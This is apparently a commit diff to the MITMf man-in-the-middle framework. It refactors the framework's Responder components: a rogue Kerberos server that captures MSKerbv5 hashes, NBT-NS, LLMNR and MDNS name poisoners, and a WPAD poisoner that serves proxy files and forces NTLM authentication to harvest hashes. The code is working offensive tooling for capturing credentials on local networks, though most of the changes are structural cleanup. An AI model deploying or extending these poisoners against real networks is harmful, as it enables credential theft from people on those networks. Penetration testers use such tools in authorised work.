Kerberos sever back online, squashed some bugs

core/responder/fingerprinter/LANFingerprinter.py

@@ -3,9 +3,9 @@ import socket
 import threading
 import struct
 import logging
+import string
 
 from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
-from core.configwatcher import ConfigWatcher
 from core.responder.fingerprinter.RAPLANMANPackets import *
 
 mitmf_logger = logging.getLogger("mitmf")
@@ -60,6 +60,20 @@ def NBT_NS_Role(data):
     else:
         return "Service not known."
 
+def Decode_Name(nbname):
+    #From http://code.google.com/p/dpkt/ with author's permission.
+    try:
+        if len(nbname) != 32:
+            return nbname
+        l = []
+        for i in range(0, 32, 2):
+            l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
+                       ((ord(nbname[i+1]) - 0x41) & 0xf)))
+        return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
+    except Exception, e:
+        mitmf_logger.debug("[LANFingerprinter] Error parsing NetBIOS name: {}".format(e))
+        return "Illegal NetBIOS name"
+
 def WorkstationFingerPrint(data):
     Role = {
         "\x04\x00"    :"Windows 95",

core/responder/kerberos/KERBServer.py

@@ -1,35 +1,37 @@
-##################################################################################
+
-#Kerberos Server stuff starts here
+import socket
-##################################################################################
+import threading
+import struct
+import logging
+
+from SocketServer import UDPServer, TCPServer, ThreadingMixIn, BaseRequestHandler
+
+mitmf_logger = logging.getLogger("mitmf")
 
 class KERBServer():
 
-	def serve_thread_udp(host, port, handler):
+	def serve_thread_udp(self, host, port, handler):
 		try:
 			server = ThreadingUDPServer((host, port), handler)
 			server.serve_forever()
 		except Exception, e:
-			print "Error starting UDP server on port %s: %s:" % (str(port),str(e))
+			mitmf_logger.debug("[KERBServer] Error starting UDP server on port 88: {}:".format(e))
 
-	def serve_thread_tcp(host, port, handler):
+	def serve_thread_tcp(self, host, port, handler):
 		try:
 			server = ThreadingTCPServer((host, port), handler)
 			server.serve_forever()
 		except Exception, e:
-			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+			mitmf_logger.debug("[KERBServer] Error starting TCP server on port 88: {}:".format(e))
 
 	#Function name self-explanatory
-	def start(Krb_On_Off):
+	def start(self):
-		if Krb_On_Off == "ON":
+		mitmf_logger.debug("[KERBServer] online")
-			t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP))
+		t1 = threading.Thread(name="KERBServerUDP", target=self.serve_thread_udp, args=("0.0.0.0", 88,KerbUDP))
-			t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP))
+		t2 = threading.Thread(name="KERBServerTCP", target=self.serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP))
-			for t in [t1,t2]:
+		for t in [t1,t2]:
-				t.setDaemon(True)
+			t.setDaemon(True)
-				t.start()
+			t.start()
-
-			return t1, t2
-		if Krb_On_Off == "OFF":
-			return False
 
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
 
@@ -45,6 +47,28 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		TCPServer.server_bind(self)
 
+class KerbTCP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			KerbHash = ParseMSKerbv5TCP(data)
+			if KerbHash:
+				mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash))
+		except Exception:
+			raise
+
+class KerbUDP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data, soc = self.request
+			KerbHash = ParseMSKerbv5UDP(data)
+			if KerbHash:
+				mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash))
+		except Exception:
+			raise
+
 def ParseMSKerbv5TCP(Data):
 	MsgType = Data[21:22]
 	EncType = Data[43:44]
@@ -131,33 +155,3 @@ def ParseMSKerbv5UDP(Data):
 			return BuildHash
 	else:
 		return False
-
-class KerbTCP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			data = self.request.recv(1024)
-			KerbHash = ParseMSKerbv5TCP(data)
-			if KerbHash:
-				Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt"
-				WriteData(Outfile,KerbHash, KerbHash)
-				responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
-		except Exception:
-			raise
-
-class KerbUDP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			data, soc = self.request
-			KerbHash = ParseMSKerbv5UDP(data)
-			if KerbHash:
-				Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt"
-				WriteData(Outfile,KerbHash, KerbHash)
-				responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
-		except Exception:
-			raise
-
-##################################################################################
-#Kerberos Server stuff ends here
-##################################################################################

core/responder/nbtns/NBTNSPoisoner.py

@@ -4,6 +4,7 @@ import threading
 import socket
 import struct
 import logging
+import string
 
 from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
 from core.configwatcher import ConfigWatcher
@@ -105,7 +106,8 @@ def Decode_Name(nbname):
 			l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
 					   ((ord(nbname[i+1]) - 0x41) & 0xf)))
 		return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
-	except:
+	except Exception, e:
+		mitmf_logger.debug("[NBTNSPoisoner] Error parsing NetBIOS name: {}".format(e))
 		return "Illegal NetBIOS name"
 
 # NBT_NS Server class.

core/responder/wpad/WPADPoisoner.py

@@ -2,15 +2,17 @@ import socket
 import threading
 import logging
 
-from HTTPPackets import *
 from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+from core.configwatcher import ConfigWatcher
+from HTTPPackets import *
 
 mitmf_logger = logging.getLogger("mitmf")
 
 class WPADPoisoner():
 
-	def start(on_off):
+	def start(self):
 		try:
+			mitmf_logger.debug("[WPADPoisoner] online")
 			server = ThreadingTCPServer(("0.0.0.0", 80), HTTP)
 			t = threading.Thread(name="HTTP", target=server.serve_forever)
 			t.setDaemon(True)
@@ -25,6 +27,27 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		TCPServer.server_bind(self)
 
+#HTTP Server Class
+class HTTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				self.request.settimeout(1)
+				data = self.request.recv(8092)
+				buff = WpadCustom(data,self.client_address[0])
+				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
+					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
+					if Verbose:
+						print Message
+					mitmf_logger.info(Message)
+					self.request.send(buff)
+				else:
+					buffer0 = PacketSequence(data,self.client_address[0])
+					self.request.send(buffer0)
+		except Exception:
+			pass#No need to be verbose..
+
 #Parse NTLMv1/v2 hash.
 def ParseHTTPHash(data,client):
 	LMhashLen = struct.unpack('<H',data[12:14])[0]
@@ -214,25 +237,4 @@ def PacketSequence(data,client):
 
 	else:
 		return str(Basic_Ntlm(Basic))
-
-#HTTP Server Class
-class HTTP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			while True:
-				self.request.settimeout(1)
-				data = self.request.recv(8092)
-				buff = WpadCustom(data,self.client_address[0])
-				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
-					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
-					if Verbose:
-						print Message
-					mitmf_logger.info(Message)
-					self.request.send(buff)
-				else:
-					buffer0 = PacketSequence(data,self.client_address[0])
-					self.request.send(buffer0)
-		except Exception:
-			pass#No need to be verbose..
 			

mitmf.py

@@ -176,6 +176,7 @@ SMBserver().start()
 #start the reactor
 reactor.run()
 
+print "\n"
 #run each plugins finish() on exit
 for p in load:
     p.finish()

plugins/Responder.py

@@ -30,6 +30,8 @@ from core.responder.wpad.WPADPoisoner import WPADPoisoner
 from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
 from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
 from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
+from core.responder.wpad.WPADPoisoner import WPADPoisoner
+from core.responder.kerberos.KERBServer import KERBServer
 
 class Responder(Plugin):
     name        = "Responder"
@@ -50,11 +52,12 @@ class Responder(Plugin):
         except Exception, e:
             sys.exit('[-] Error parsing config for Responder: ' + str(e))
 
-        LLMNRPoisoner().start(options, self.ourip)
-        MDNSPoisoner().start(options, self.ourip)
-        NBTNSPoisoner().start(options, self.ourip)
         LANFingerprinter().start(options)
-
+        MDNSPoisoner().start(options, self.ourip)
+        KERBServer().start()
+        NBTNSPoisoner().start(options, self.ourip)
+        LLMNRPoisoner().start(options, self.ourip)
+        
         if options.wpad:
             WPADPoisoner().start()